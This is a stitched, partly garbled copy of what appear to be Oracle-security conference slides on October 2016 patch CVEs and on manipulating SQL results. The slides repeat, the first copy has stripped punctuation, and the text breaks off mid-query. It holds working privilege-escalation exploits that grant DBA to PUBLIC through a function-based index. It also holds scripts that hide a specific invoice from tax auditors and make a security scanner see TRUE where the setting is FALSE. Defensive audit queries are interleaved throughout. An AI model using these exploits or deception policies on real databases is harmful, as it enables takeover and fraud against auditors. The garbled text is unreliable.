ORA-06598: Nicht ausreichende INHERIT PRIVILEGES-Berechtigung
ORA-06512: in "SYSTEM.GETDBA", Zeile 1
-- On 12.1.0.2 the user WMSYS has CREATE ANY INDEX and the SYSTEM user can use
-- CREATE ANY PROCEDURE to create a function in the schema of WMSYS
CREATE OR REPLACE FUNCTION wmsys.GETDBA(FOO VARCHAR) RETURN VARCHAR DETERMINISTIC AUTHID CURRENT_USER IS
  PRAGMA AUTONOMOUS_TRANSACTION;
BEGIN
  execute immediate 'grant select on sys.link$ to public';
  COMMIT;
  RETURN FOO;
END;
/
SQL> grant execute on wmsys.getdba to public;
-- now we create the index
SQL> CREATE INDEX EXPLOIT_INDEX ON SYS.INCVID(WMSYS.GETDBA('AK'));
August 2016
Hackproofing Oracle's eBusiness Suite by David Litchfield
Presentation + Supporting documents
https://www.blackhat.com/docs/us-16/materials/us-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite.pdf
https://www.blackhat.com/docs/us-16/materials/us-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-1.pdf
https://www.blackhat.com/docs/us-16/materials/us-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-2.pdf
https://www.blackhat.com/docs/us-16/materials/us-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-3.pdf
https://www.blackhat.com/docs/us-16/materials/us-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-4.pdf
https://www.blackhat.com/docs/us-16/materials/us-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-5.pdf
September 2016
Nothing special happened
October 2016
Oracle CPU October 2016
http://www.oracle.com/technetwork/security-advisory/cpuoct2016-2881722.html
October 2016 CPU
9 security fixes (1 remote exploitable)
1 OJVM (CVSS 9.1)
2 Kernel PDB (CVSS 6.4, 6.0)
3 RDBMS Security (CVSS 6.4, 3.3, 3.3)
1 APEX (CVSS 6.1, remote)
1 RDBMS Security & SQL*Plus (CVSS 2.4)
Oct 2016 CPU - CVE-2016-5497
Problem: UNSALTED MD5 HASH STILL PRESENT IN 12C DATABASE - DIGEST VERIFIER
Shown as an open problem at the DOAG 2015 presentation
Reporter: Alexander Kornbrust
Oracle Password Hash 12.1.0.2+
Oracle 12.1.0.2 introduced a new PBKDF2 / SHA-512 based algorithm.
The new T: password hash is 10 times slower than the old DES hash (Oracle 7+) and 88 times slower than the SHA1-based hash (Oracle 11+).
The new algorithm is known and already implemented in some tools.
Remark: Microsoft Office 2013 is 10 times more time consuming to crack than the new Oracle PBKDF2.
Oracle Password Hash 12.1.0.2+
Let's have a look at RFC 2617:
KD(secret, data) = H(concat(secret, ":", data))
No salt, but a secret.
Secret = 'XDB'
and the hash will be MD5(XDB:tiger)
and is stored in the spare4 column, starting with H: (the H hash).
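An added check, not part of the deck: run as SYS, it lists which verifier types each account carries in sys.user$.spare4 (the S:, H: and T: prefixes the slides mention, plus the legacy DES hash in the PASSWORD column), so accounts still holding the unsalted H: digest verifier can be reviewed. DBA_USERS.PASSWORD_VERSIONS is joined in as the documented view of the same information; the H: verifier only matters for XDB HTTP digest authentication.

```sql
-- Added check, not from the original deck. Run as SYS on 12.1.0.2+.
-- spare4 stores the verifiers as 'S:<salted sha1>;H:<md5 digest>;T:<pbkdf2/sha512>'.
-- The prefixes S, H and T are not hex digits, so INSTR cannot match inside a hash value.
SELECT u.name AS username,
       d.account_status,
       d.password_versions,
       CASE WHEN u.password IS NOT NULL    THEN 'yes' ELSE 'no' END AS has_10g_des,
       CASE WHEN INSTR(u.spare4, 'S:') > 0 THEN 'yes' ELSE 'no' END AS has_11g_sha1,
       CASE WHEN INSTR(u.spare4, 'H:') > 0 THEN 'yes' ELSE 'no' END AS has_http_md5_digest,
       CASE WHEN INSTR(u.spare4, 'T:') > 0 THEN 'yes' ELSE 'no' END AS has_12c_pbkdf2
  FROM sys.user$ u
  JOIN dba_users d ON d.username = u.name
 WHERE u.type# = 1                      -- users only (type# 0 = roles)
 ORDER BY has_http_md5_digest DESC, u.name;

-- Totals: how many open accounts still carry the unsalted H: digest verifier.
SELECT COUNT(*) AS open_accounts,
       SUM(CASE WHEN INSTR(u.spare4, 'H:') > 0 THEN 1 ELSE 0 END) AS with_http_md5_digest
  FROM sys.user$ u
  JOIN dba_users d ON d.username = u.name
 WHERE u.type# = 1
   AND d.account_status = 'OPEN';
```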
Oct 2016 CPU - CVE-2016-5516
Problem: In Oracle 12c the DBMS_PDB_EXEC_SQL procedure is a wrapper for the DBMS_PDB.EXEC_AS_ORACLE_SCRIPT procedure, which executes SQL as the SYS user. The XDB user has the execute privilege on DBMS_PDB_EXEC_SQL and as such, by first exploiting a vulnerability in a publicly executable XDB-owned PL/SQL object, an attacker can leverage this privilege to execute SQL as SYS. The fix changes both DBMS_PDB_EXEC_SQL and DBMS_PDB from the DEFINER rights to the INVOKER rights execution model.
Reporter: David Litchfield
Oct 2016 CPU - CVE-2016-5604
Problem: Privilege Escalation in Oracle Cloud Control (12.1.3)
Reporter: Alexander Kornbrust
$ sqlplus sysman_apm/rds@ora1
SQL> desc dba_users
ERROR:
ORA-04043: object "SYS"."DBA_USERS" does not exist
==> user does not have the privilege to access DBA_USERS
SQL> select * from user_sys_privs;

USERNAME                       PRIVILEGE                                ADM
------------------------------ ---------------------------------------- ---
SYSMAN_APM                     UNLIMITED TABLESPACE                     NO
SYSMAN_APM                     CREATE VIEW                              NO
SYSMAN_APM                     CREATE ANY LIBRARY                       NO
SYSMAN_APM                     CREATE SEQUENCE                          NO
SYSMAN_APM                     CREATE TABLE                             NO
SYSMAN_APM                     CREATE LIBRARY                           NO
SYSMAN_APM                     CREATE ANY INDEX                         NO

==> CREATE ANY LIBRARY privilege is granted to SYSMAN_APM
SQL> select * from user_role_privs;

USERNAME                       GRANTED_ROLE                   ADM DEF OS_
------------------------------ ------------------------------ --- --- ---
SYSMAN_APM                     CONNECT                        NO  YES NO
SYSMAN_APM                     RESOURCE                       NO  YES NO

==> Create a function GETDBA to escalate privileges using AUTHID CURRENT_USER
SQL> CREATE OR REPLACE FUNCTION GETDBA(FOO VARCHAR) RETURN VARCHAR DETERMINISTIC AUTHID CURRENT_USER IS
       PRAGMA AUTONOMOUS_TRANSACTION;
     BEGIN
       execute immediate 'grant dba to public';
       COMMIT;
       RETURN FOO;
     END;
     /
==> Grant execution privileges to PUBLIC
SQL> grant execute on getdba to public;
==> Create an index on SYSTEM.HELP using a function-based index (FBI). The function getdba is used in the function-based index.
SQL> CREATE INDEX EXPLOIT_INDEX ON SYSTEM.HELP(SYSMAN_APM.GETDBA('AK2'));
==> Reconnect is necessary.
SQL> select * from dba_role_privs where granted_role='DBA' and grantee='PUBLIC';

GRANTEE                        GRANTED_ROLE                   ADM DEF
------------------------------ ------------------------------ --- ---
PUBLIC                         DBA                            NO  YES
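As an added defender-side check (not part of the original deck, and covering both the CVE-2016-3489 and the CVE-2016-5604 walkthroughs above), the following SQL*Plus script looks for the two ingredients of the function-based-index escalation: index expressions on SYS/SYSTEM tables that call a function owned by another schema, and the accounts holding the privileges that make the pattern possible. It assumes a 12.1 dictionary (DBA_IND_EXPRESSIONS, DBA_USERS.ORACLE_MAINTAINED, DBA_TAB_PRIVS.TYPE) and a DBA session; the [HIGH]/[INFO] labels are a constructed convention.

```sql
-- Added audit script, not from the original deck. Assumes Oracle 12.1 dictionary views
-- and a DBA session; the [HIGH]/[INFO] labels are a constructed convention.
SET SERVEROUTPUT ON SIZE UNLIMITED

-- (1) Function-based indexes whose expression calls SCHEMA.FUNCTION(...) from a schema
--     other than the indexed table's owner. The expression is evaluated with the table
--     owner's rights (SYS or SYSTEM in the cases above), which is the whole escalation.
--     DBA_IND_EXPRESSIONS.COLUMN_EXPRESSION is a LONG column, so it is inspected in PL/SQL.
DECLARE
  l_expr     VARCHAR2(32767);
  l_fn_owner VARCHAR2(128);
  l_hits     PLS_INTEGER := 0;
BEGIN
  FOR r IN (SELECT index_owner, index_name, table_owner, table_name, column_expression
              FROM dba_ind_expressions) LOOP
    -- Stored form uses quoted identifiers, e.g. "SYSMAN_APM"."GETDBA"('AK2');
    -- drop the quotes, then take the identifier before the dot in OWNER.NAME( as the owner.
    l_expr     := UPPER(REPLACE(r.column_expression, '"', ''));
    l_fn_owner := REGEXP_SUBSTR(l_expr, '([A-Z0-9_$#]+)\.[A-Z0-9_$#]+\s*\(', 1, 1, NULL, 1);
    IF l_fn_owner IS NOT NULL AND l_fn_owner <> r.table_owner THEN
      l_hits := l_hits + 1;
      DBMS_OUTPUT.PUT_LINE(
        CASE WHEN r.table_owner IN ('SYS', 'SYSTEM') THEN '[HIGH] ' ELSE '[INFO] ' END
        || r.index_owner || '.' || r.index_name || ' ON ' || r.table_owner || '.'
        || r.table_name || ' calls code owned by ' || l_fn_owner || ': ' || l_expr);
    END IF;
  END LOOP;
  -- A hit can also be PACKAGE.FUNCTION in the table owner's own schema; confirm the
  -- first identifier against DBA_OBJECTS before treating it as an escalation attempt.
  DBMS_OUTPUT.PUT_LINE(l_hits || ' cross-schema function-based index expression(s).');
END;
/

-- (2) Who can set this up? CREATE ANY INDEX puts an index (and so a function call) on
--     another schema's table; CREATE ANY PROCEDURE plants the function in a schema that
--     already has CREATE ANY INDEX (the WMSYS variant above); INHERIT ANY PRIVILEGES lets
--     invoker's-rights code borrow the caller's privileges (what ORA-06598 refused).
SELECT p.grantee,
       CASE WHEN u.username IS NULL        THEN 'ROLE'
            WHEN u.oracle_maintained = 'Y' THEN 'ORACLE ACCOUNT'
            ELSE 'USER' END AS grantee_kind,
       p.privilege, p.admin_option
  FROM dba_sys_privs p
  LEFT JOIN dba_users u ON u.username = p.grantee
 WHERE p.privilege IN ('CREATE ANY INDEX', 'CREATE ANY PROCEDURE', 'INHERIT ANY PRIVILEGES')
 ORDER BY p.privilege, grantee_kind, p.grantee;

-- (3) 12c grants INHERIT PRIVILEGES ON USER <x> TO PUBLIC for every new account, so any
--     invoker's-rights function that <x> is made to run inherits <x>'s privileges.
--     Accounts holding DBA should not keep that default; list them so it can be revoked.
SELECT t.table_name AS privileged_user, t.grantee, t.privilege
  FROM dba_tab_privs t
 WHERE t.privilege = 'INHERIT PRIVILEGES'
   AND t.type = 'USER'
   AND t.grantee = 'PUBLIC'
   AND t.table_name IN (SELECT grantee FROM dba_role_privs WHERE granted_role = 'DBA')
 ORDER BY 1;
```

Grants that arrive through a role (query 2 shows the role as grantee) need a second pass over DBA_ROLE_PRIVS to see who ultimately holds them.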
Possible approaches
modify views (eg add spare=DBA1 to the view dba_audit_trail)All entries of the OSUSER DBA1 will be removed in the view If a SIEM solution retrieves the audit data stuff from DBA1 is not retrieved
create or change synonyms to bdquoredirectldquo objects
replace table with viewinstead of trigger
mdashmdashmdashmdashmdash dbms_macadmmdashmdashmdashmdashmdash FUNCTION CHECK_BACKUP_PARM_VARCHAR RETURN VARCHAR2 IS TMP VARCHAR2(32767) TMP2 VARCHAR2(32767)
BEGIN SELECT DVSYSDV_SQL_TEXT INTO TMP FROM DUAL IF LENGTH(TMP) = 4000 THEN RETURN rsquoN END IF TMP2 = UPPER(TMP) IF (TMP2) LIKE RECYCLEBIN AND (TMP2) LIKE ON THEN RETURN N END IF RETURN Y END
SQLgt create or replace view mydual as select X as dummy from dual where user=DVSYS
SQLgt grant select on sysmydual to public SQLgt drop public synonym dual SQLgt create public synonym dual for sysmydual
SYS CAN INFLUENCE DVSYS-ANALYSIS VIA VIEW NAMED DUAL
Red Attack - Die Katastrophe in der Datenbank (Gunther Pipperr)
hellip where x=y
where conditions can be changed using VPD
VPD add where clauseinvoice_name = SAUNA_CLUB CHANTAL
Hide bdquocertainldquo invoices from the audit
department
Select value from tableview where x=y
SQL Translation Framework (12c only) allows to
replace an entire queryUser submits Query A SQL Translation Framework replaces Query A
with Query B
Possible Countermeasures for paranoid Auditors
Add a random string eg aksdjhiuz to avoid
SQL Translation Framework (new SQLID)
Try to get EXEMPT ACCESS POLICY to disable
VPD (even if not used in the application)
Use full qualified names instead of synonyms(eg SYSDUAL instead of DUAL)
Always check the object type (is is really a table)
Use checksums for certain database objects
(especially views)
Check the current schema to avoid attacks
(eg alter session set current_schema=otheruser)
Modifying Queries on the fly
Powerful features for application
(Huge) potential on critical systems to modify
application logic (eg DB Vault)
DBAs and AuditorsSecurity Department should
be aware of powerful Oracle features which
could be used to modify application logic
Audit these features even if not in use
Trends 2017
New hardening documents for Oracle 122
required (new features new packages hellip)
Migration to 122
More auditing projects
Integration Auditing with SIEM solutions
Q amp A
Thank you Contact
Red-Database-Security GmbH
Eibenweg 42
D-63150 Heusenstamm
Germany
October 2016
Oracle CPU October 2016
http://www.oracle.com/technetwork/security-advisory/cpuoct2016-2881722.html
October 2016 CPU
9 security fixes (1 remote exploitable)
1 OJVM (CVSS 9.1)
2 Kernel PDB (CVSS 6.4, 6.0)
3 RDBMS Security (CVSS 6.4, 3.3, 3.3)
1 APEX (CVSS 6.1, remote)
1 RDBMS Security & SQL*Plus (CVSS 2.4)
Oct 2016 CPU - CVE-2016-5497
Problem: Unsalted MD5 hash still present in the 12c database (digest verifier)
Shown as an open problem in the DOAG 2015 presentation
Reporter: Alexander Kornbrust
Oracle Password Hash 12.1.0.2+
Oracle 12.1.0.2 introduced a new PBKDF2-based, SHA-512 password verifier (the T: hash in SYS.USER$.SPARE4)
The new T: password hash is 10 times slower to crack than the old DES hash (Oracle 7+) and 88 times slower than the SHA-1 based hash (Oracle 11+)
The new algorithm is known and already implemented in some cracking tools
Remark: Microsoft Office 2013 is still 10 times more time consuming to crack than the new Oracle PBKDF2 verifier
Oracle Password Hash 12.1.0.2+
Let's have a look at RFC 2617 (HTTP Digest Access Authentication):
KD(secret, data) = H(concat(secret, ":", data))
No random salt, but a "secret": the realm
Secret = 'XDB' (the same fixed string on every database)
For a user with the password tiger the digest is therefore MD5(username:XDB:tiger), a single unsalted MD5 over inputs that are all public
and it is stored in the SPARE4 column of SYS.USER$ in the field starting with H:
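The following is an added example, not part of the original slides: an audit script for the H: digest verifier described above. It assumes a session with SELECT on SYS.USER$ and EXECUTE on SYS.DBMS_CRYPTO (a SYS-owned package that is not granted to PUBLIC); the candidate password list is constructed test data.

```sql
-- Added example (not from the original slides): audit the 'H:' digest verifier
-- in SYS.USER$.SPARE4. Assumptions: a session with SELECT on SYS.USER$ and
-- EXECUTE on SYS.DBMS_CRYPTO; the candidate passwords are constructed test data.
--
-- The H: value is the RFC 2617 HA1 digest
--     MD5( username || ':' || 'XDB' || ':' || password )
-- with the fixed realm XDB as the only "secret": there is no random salt, so the
-- same username/password pair yields the same H: value on every database.

-- 1. Which verifier types does each account carry?
SELECT name,
       CASE WHEN spare4 LIKE '%S:%' THEN 'Y' ELSE 'N' END AS sha1_11g,
       CASE WHEN spare4 LIKE '%H:%' THEN 'Y' ELSE 'N' END AS md5_digest,
       CASE WHEN spare4 LIKE '%T:%' THEN 'Y' ELSE 'N' END AS pbkdf2_12c
  FROM sys.user$
 WHERE type# = 1            -- 1 = user, 0 = role
   AND spare4 IS NOT NULL
 ORDER BY name;

-- 2. Recompute the digest for a few weak passwords and report matches.
SET SERVEROUTPUT ON
DECLARE
  TYPE t_words IS TABLE OF VARCHAR2(30);
  l_words  t_words := t_words('tiger', 'manager', 'oracle', 'change_on_install', 'welcome1');
  l_stored VARCHAR2(32);
  l_digest VARCHAR2(32);
BEGIN
  FOR u IN (SELECT name, spare4 FROM sys.user$
             WHERE type# = 1 AND spare4 LIKE '%H:%') LOOP
    -- SPARE4 holds ';'-separated fields; pick the 32 hex digits that follow 'H:'
    l_stored := UPPER(REGEXP_SUBSTR(u.spare4, 'H:([0-9A-Fa-f]{32})', 1, 1, NULL, 1));
    FOR i IN 1 .. l_words.COUNT LOOP
      -- one plain MD5 per candidate: no iterations, no per-user random salt
      l_digest := RAWTOHEX(DBMS_CRYPTO.HASH(
                    UTL_RAW.CAST_TO_RAW(u.name || ':XDB:' || l_words(i)),
                    DBMS_CRYPTO.HASH_MD5));
      IF l_digest = l_stored THEN
        DBMS_OUTPUT.PUT_LINE('weak password: ' || u.name || ' / ' || l_words(i));
      END IF;
    END LOOP;
  END LOOP;
END;
/
```

The first query shows why the finding matters even on a patched 12c system: as long as an account still carries an H: field, the strength of its T: verifier is irrelevant, because an attacker with read access to SYS.USER$ simply attacks the MD5 value instead. Two databases with the same username and password also share the same H: value, so one cracked digest can be checked against every other database without recomputation.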
Oct 2016 CPU - CVE-2016-5516
Problem: In Oracle 12c the DBMS_PDB_EXEC_SQL procedure is a wrapper for the DBMS_PDB.EXEC_AS_ORACLE_SCRIPT procedure, which executes SQL as the SYS user. The XDB user has the EXECUTE privilege on DBMS_PDB_EXEC_SQL; by first exploiting a vulnerability in a publicly executable XDB-owned PL/SQL object, an attacker can therefore leverage this privilege to execute SQL as SYS. The fix changes both DBMS_PDB_EXEC_SQL and DBMS_PDB from the DEFINER rights to the INVOKER rights execution model.
Reporter: David Litchfield
Oct 2016 CPU - CVE-2016-5604
Problem: Privilege escalation in Oracle Cloud Control (12.1.3)
Reporter: Alexander Kornbrust
sqlplus sysman_apm@rdsora1

SQL> desc dba_users
ERROR:
ORA-04043: object SYS.DBA_USERS does not exist
==> the user does not have the privilege to access DBA_USERS

SQL> select * from user_sys_privs;

USERNAME     PRIVILEGE              ADM
------------ ---------------------- ---
SYSMAN_APM   UNLIMITED TABLESPACE   NO
SYSMAN_APM   CREATE VIEW            NO
SYSMAN_APM   CREATE ANY LIBRARY     NO
SYSMAN_APM   CREATE SEQUENCE        NO
SYSMAN_APM   CREATE TABLE           NO
SYSMAN_APM   CREATE LIBRARY         NO
SYSMAN_APM   CREATE ANY INDEX       NO
==> the CREATE ANY LIBRARY privilege (and CREATE ANY INDEX) is granted to SYSMAN_APM

SQL> select * from user_role_privs;

USERNAME     GRANTED_ROLE   ADM DEF OS_
------------ -------------- --- --- ---
SYSMAN_APM   CONNECT        NO  YES NO
SYSMAN_APM   RESOURCE       NO  YES NO

==> Create a function GETDBA to escalate privileges, using AUTHID CURRENT_USER
SQL> CREATE OR REPLACE FUNCTION GETDBA(FOO VARCHAR) RETURN VARCHAR DETERMINISTIC AUTHID CURRENT_USER IS
  2    PRAGMA AUTONOMOUS_TRANSACTION;
  3  BEGIN
  4    execute immediate 'grant dba to public';
  5    COMMIT;
  6    RETURN FOO;
  7  END;
  8  /
==> Grant execute privileges to PUBLIC
SQL> grant execute on getdba to public;
==> Create a function-based index (FBI) on SYSTEM.HELP; the function GETDBA is used as the index expression
SQL> CREATE INDEX EXPLOIT_INDEX ON SYSTEM.HELP(SYSMAN_APM.GETDBA('AK2'));
==> A reconnect is necessary
SQL> select * from dba_role_privs where granted_role='DBA' and grantee='PUBLIC';

GRANTEE      GRANTED_ROLE   ADM DEF
------------ -------------- --- ---
PUBLIC       DBA            NO  YES
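The following is an added example, not part of the original slides: the checks a DBA would run after applying the October CPU for the two findings above, CVE-2016-5516 (the SYS wrapper DBMS_PDB_EXEC_SQL) and CVE-2016-5604 (privilege escalation through a function-based index). It assumes a DBA or audit session with SELECT on the DBA_* views; on a 12c CDB it has to be run in CDB$ROOT and in every PDB.

```sql
-- Added example (not from the original slides): post-CPU checks for the two
-- October findings above. Assumption: a DBA or audit session with SELECT on
-- the DBA_* views; on a 12c CDB run it in CDB$ROOT and in every PDB.

-- CVE-2016-5516: who may call the SYS wrapper, and are both objects now
-- invoker rights (AUTHID = CURRENT_USER) as the fix describes?
SELECT grantee, table_name, privilege
  FROM dba_tab_privs
 WHERE owner = 'SYS' AND table_name IN ('DBMS_PDB', 'DBMS_PDB_EXEC_SQL')
 ORDER BY table_name, grantee;

SELECT DISTINCT object_name, object_type, authid
  FROM dba_procedures
 WHERE owner = 'SYS' AND object_name IN ('DBMS_PDB', 'DBMS_PDB_EXEC_SQL')
 ORDER BY object_name;

-- CVE-2016-5604: accounts holding CREATE ANY INDEX / CREATE ANY LIBRARY,
-- directly or through any chain of roles (Oracle forbids circular role
-- grants, so the recursion terminates).
WITH role_chain (grantee, role_name) AS (
  SELECT grantee, granted_role FROM dba_role_privs
  UNION ALL
  SELECT rc.grantee, rp.granted_role
    FROM role_chain rc
    JOIN dba_role_privs rp ON rp.grantee = rc.role_name
)
SELECT privilege, grantee, 'DIRECT' AS via
  FROM dba_sys_privs
 WHERE privilege IN ('CREATE ANY INDEX', 'CREATE ANY LIBRARY')
UNION
SELECT sp.privilege, rc.grantee, 'ROLE ' || rc.role_name
  FROM dba_sys_privs sp
  JOIN role_chain rc ON rc.role_name = sp.grantee
 WHERE sp.privilege IN ('CREATE ANY INDEX', 'CREATE ANY LIBRARY')
 ORDER BY 1, 2, 3;

-- The footprint of the attack itself: a function-based index created by one
-- schema on another schema's table, evaluating a function the table owner
-- does not control.
SELECT i.owner AS index_owner, i.index_name, i.table_owner, i.table_name,
       e.column_expression
  FROM dba_indexes i
  JOIN dba_ind_expressions e
    ON e.index_owner = i.owner AND e.index_name = i.index_name
 WHERE i.index_type LIKE 'FUNCTION-BASED%'
   AND i.owner <> i.table_owner
 ORDER BY i.owner, i.index_name;

-- And the end state the slide finishes with: any role granted to PUBLIC is a finding.
SELECT grantee, granted_role FROM dba_role_privs WHERE grantee = 'PUBLIC';
```

The role-chain query matters because CREATE ANY INDEX rarely appears as a direct grant on an application account; it usually arrives through a role, and DBA_SYS_PRIVS alone shows only the role as grantee. The function-based-index query is the one to keep in a recurring audit job: the index in the transcript above survives the attacker's reconnect, so it is visible long after the grant to PUBLIC has been made.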
November 2016
DOAG 2016
Modifying SQL Statements and Application Logic
Scenario 1
A top manager comes to the office of the DBA and asks you: "Tomorrow the auditor from the tax authority will come to check our invoices. Could you hide the 10,000 EUR invoice from the last party at the night club, just from the auditor? I will increase your salary…"
Scenario 2
Remove your own audit entries from the audit log which is retrieved by the SIEM solution (e.g. Splunk, QRadar, …) via JDBC
Scenario 3
You don't have time to harden all your databases, but the security department wants to see results. Instead of fixing the problem you just deliver the "proper" results
A lot of different wishes…
but luckily we are using Oracle
Problem & Solution
Oracle offers different features to fulfil these wishes without affecting other users…
All these scenarios have in common that we have to manipulate the SQL statement
Select value …
Oracle Data Redaction allows to mask / manipulate the selected data just for a single database user
Possible usage: replace true/false, replace USER/ADMIN, …
the DBA can decide what will be returned
Select value …
A typical query from security checklists / scanners looks like this: select upper(value) from parameter where upper(name) = 'XYZ'
The tool expects the value TRUE, but the column contains FALSE
Oracle Data Redaction allows you to change the result value from FALSE to TRUE
==> The audit department is happy because the database passes all the security checks…
… from table/view …
Modifying objects can be used as a man-in-the-middle as well
Possible approaches:
modify views (e.g. add the predicate spare1 <> 'DBA1' on the OS username column to the view DBA_AUDIT_TRAIL): all entries of the OS user DBA1 disappear from the view, so if a SIEM solution retrieves the audit data through the view, DBA1's activity is never retrieved
create or change synonyms to "redirect" objects
replace a table with a view plus an INSTEAD OF trigger
Example: Database Vault's DBMS_MACADM.CHECK_BACKUP_PARM_VARCHAR reads the statement text through an unqualified DUAL (LIKE wildcards and quotes restored from the extracted slide):
----- dbms_macadm -----
FUNCTION CHECK_BACKUP_PARM_VARCHAR RETURN VARCHAR2 IS
  TMP  VARCHAR2(32767);
  TMP2 VARCHAR2(32767);
BEGIN
  SELECT DVSYS.DV_SQL_TEXT INTO TMP FROM DUAL;
  IF LENGTH(TMP) = 4000 THEN
    RETURN 'N';
  END IF;
  TMP2 := UPPER(TMP);
  IF (TMP2) LIKE '%RECYCLEBIN%' AND (TMP2) LIKE '%ON%' THEN
    RETURN 'N';
  END IF;
  RETURN 'Y';
END;
SYS replaces DUAL with a view of its own:
SQL> create or replace view mydual as select 'X' as dummy from dual where user='DVSYS';
SQL> grant select on sys.mydual to public;
SQL> drop public synonym dual;
SQL> create public synonym dual for sys.mydual;
==> SYS can influence the DVSYS analysis via a view named DUAL
Source: "Red Attack - Die Katastrophe in der Datenbank" (Red Attack: the catastrophe in the database), Gunther Pipperr
… where x=y
WHERE conditions can be changed using VPD (Virtual Private Database)
VPD adds a where clause: invoice_name != 'SAUNA_CLUB CHANTAL'
Hide "certain" invoices from the audit department
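The following is an added example, not part of the original slides: what the Data Redaction manipulation (scenario 3, the FALSE-to-TRUE rewrite) and the VPD manipulation (scenario 1, the hidden invoice) look like as actual configuration. It assumes a DBA session, an existing schema AP in which the two demo tables below are constructed, and two accounts named AUDITOR and SCANNER; VPD needs Enterprise Edition and Data Redaction is licensed as part of Advanced Security.

```sql
-- Added example (not from the original slides): the two manipulations as
-- configuration. Assumptions: a DBA session; schema AP exists; tables
-- AP.INVOICES and AP.PARAMETER are constructed here for the demo; the audit
-- account is AUDITOR and the scanner account is SCANNER.

-- Demo data (constructed)
CREATE TABLE ap.invoices  (invoice_id NUMBER, invoice_name VARCHAR2(60), amount NUMBER);
INSERT INTO ap.invoices VALUES (1, 'OFFICE SUPPLIES', 120);
INSERT INTO ap.invoices VALUES (2, 'SAUNA_CLUB CHANTAL', 10000);
CREATE TABLE ap.parameter (name VARCHAR2(30), value VARCHAR2(30));
INSERT INTO ap.parameter VALUES ('AUDIT_SYS_OPERATIONS', 'FALSE');
COMMIT;

-- Scenario 1: a VPD policy function that appends a predicate only for AUDITOR.
-- Returning NULL means "no predicate", so every other user still sees all rows.
CREATE OR REPLACE FUNCTION ap.hide_for_auditor (p_schema IN VARCHAR2, p_object IN VARCHAR2)
  RETURN VARCHAR2 AS
BEGIN
  IF SYS_CONTEXT('USERENV', 'SESSION_USER') = 'AUDITOR' THEN
    RETURN 'invoice_name != ''SAUNA_CLUB CHANTAL''';
  END IF;
  RETURN NULL;
END;
/
BEGIN
  DBMS_RLS.ADD_POLICY(
    object_schema   => 'AP',
    object_name     => 'INVOICES',
    policy_name     => 'AUDIT_VIEW',
    function_schema => 'AP',
    policy_function => 'HIDE_FOR_AUDITOR',
    statement_types => 'SELECT');
END;
/

-- Scenario 3: Data Redaction rewrites FALSE to TRUE, but only when the
-- expression is true, i.e. only for the SCANNER session.
BEGIN
  DBMS_REDACT.ADD_POLICY(
    object_schema         => 'AP',
    object_name           => 'PARAMETER',
    policy_name           => 'PLEASE_THE_SCANNER',
    column_name           => 'VALUE',
    function_type         => DBMS_REDACT.REGEXP,
    expression            => 'SYS_CONTEXT(''USERENV'',''SESSION_USER'') = ''SCANNER''',
    regexp_pattern        => 'FALSE',
    regexp_replace_string => 'TRUE',
    regexp_position       => DBMS_REDACT.RE_BEGINNING,
    regexp_occurrence     => DBMS_REDACT.RE_ALL);
END;
/

-- Effect (run the statements as AUDITOR and SCANNER respectively):
--   SELECT invoice_name, amount FROM ap.invoices;          -- AUDITOR never sees invoice 2
--   SELECT upper(value) FROM ap.parameter
--    WHERE upper(name) = 'AUDIT_SYS_OPERATIONS';           -- SCANNER gets TRUE, all others FALSE
-- Neither control touches the stored rows, which is why a data-level comparison
-- run as a different user shows nothing unusual.
```

Both controls are skipped for sessions holding the matching exemption privilege, EXEMPT ACCESS POLICY for VPD and EXEMPT REDACTION POLICY for Data Redaction, which is why asking for EXEMPT ACCESS POLICY is on the countermeasure list for auditors. The policy expression and the VPD function are also the two places an auditor should read first: a policy that keys on SESSION_USER for exactly one account has no legitimate business use.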
Select value from table/view where x=y
The SQL Translation Framework (12c only) allows to replace an entire query: the user submits query A and the SQL Translation Framework replaces query A with query B
Possible Countermeasures for paranoid Auditors
Add a random string (e.g. aksdjhiuz) to the query text to avoid the SQL Translation Framework (different SQL text, new SQL_ID)
Try to get EXEMPT ACCESS POLICY to disable VPD (even if it is not used in the application)
Use fully qualified names instead of synonyms (e.g. SYS.DUAL instead of DUAL)
Always check the object type (is it really a table?)
Use checksums for certain database objects (especially views)
Check the current schema to avoid attacks (e.g. alter session set current_schema=otheruser)
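The following is an added example, not part of the original slides: the auditor's side of the countermeasures above, as dictionary queries covering all four manipulation vectors of this section (Data Redaction, views and synonyms, VPD, SQL Translation Framework). It assumes a session with SELECT on the DBA_* views and EXECUTE on DBMS_METADATA and DBMS_CRYPTO; the view list in step 5 is a starting point, and the baseline checksums are values you record yourself on a known-good system.

```sql
-- Added example (not from the original slides): auditor queries for the
-- countermeasures above. Assumptions: SELECT on the DBA_* views, EXECUTE on
-- DBMS_METADATA and DBMS_CRYPTO; baseline checksums recorded by you on a
-- known-good system. On a 12c CDB run everything in CDB$ROOT and in each PDB.

-- 1. Data Redaction: every policy, whom its expression targets, what it rewrites.
SELECT object_owner, object_name, policy_name, expression, enable
  FROM redaction_policies
 ORDER BY 1, 2;
SELECT object_owner, object_name, column_name, function_type,
       regexp_pattern, regexp_replace_string
  FROM redaction_columns
 ORDER BY 1, 2, 3;

-- 2. VPD: policies with their predicate function, and who is exempt.
SELECT object_owner, object_name, policy_name, pf_owner, package, function,
       sel, ins, upd, del, enable
  FROM dba_policies
 ORDER BY 1, 2;
SELECT grantee, privilege
  FROM dba_sys_privs
 WHERE privilege IN ('EXEMPT ACCESS POLICY', 'EXEMPT REDACTION POLICY');

-- 3. SQL Translation Framework (12c): profiles, stored rewrites, and the logon
--    triggers that are the usual way to push one victim session into a profile
--    or into a different current_schema.
SELECT owner, profile_name, translator, foreign_sql_syntax
  FROM dba_sql_translation_profiles;
SELECT owner, profile_name, sql_text, translated_text
  FROM dba_sql_translations;
SELECT owner, trigger_name, base_object_type, status
  FROM dba_triggers
 WHERE base_object_type IN ('DATABASE', 'SCHEMA')
   AND triggering_event LIKE '%LOGON%';

-- 4. Synonyms and shadow objects: a public synonym that carries the name of a
--    SYS object must point at exactly that SYS object, and DUAL must be the
--    SYS table, not a view somewhere else.
SELECT s.synonym_name, s.table_owner, s.table_name
  FROM dba_synonyms s
 WHERE s.owner = 'PUBLIC'
   AND EXISTS (SELECT 1 FROM dba_objects o
                WHERE o.owner = 'SYS' AND o.object_name = s.synonym_name
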